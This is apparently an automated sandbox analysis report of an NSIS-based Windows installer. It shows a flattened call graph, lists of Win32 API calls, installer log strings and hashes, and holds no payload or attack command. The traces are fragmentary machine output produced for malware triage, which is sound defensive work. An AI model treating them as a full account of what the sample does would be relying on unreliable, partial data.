40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 
SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API 
calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 
3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                        • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424170,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                        • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                        • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                        • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118665987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118690991.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118702917.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2118787059.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_ChoForgot.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                        • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                        • API String ID: 2110491804-1641061399

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                        • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                        • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                        • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                        • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                        • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                        • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                        • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                        • API String ID: 2435955865-3712954417

Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                        • String ID: jF
                                                                                                                                                                                                                                                                                                        • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                        • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                        • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                        • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                        • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                        • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                        • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                        • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                        • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                        • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                                                        • API String ID: 2872004960-3619442763

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                                                                                        • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                                                                                        • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                                                                                        • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2118677582.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3282139019-0

                                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
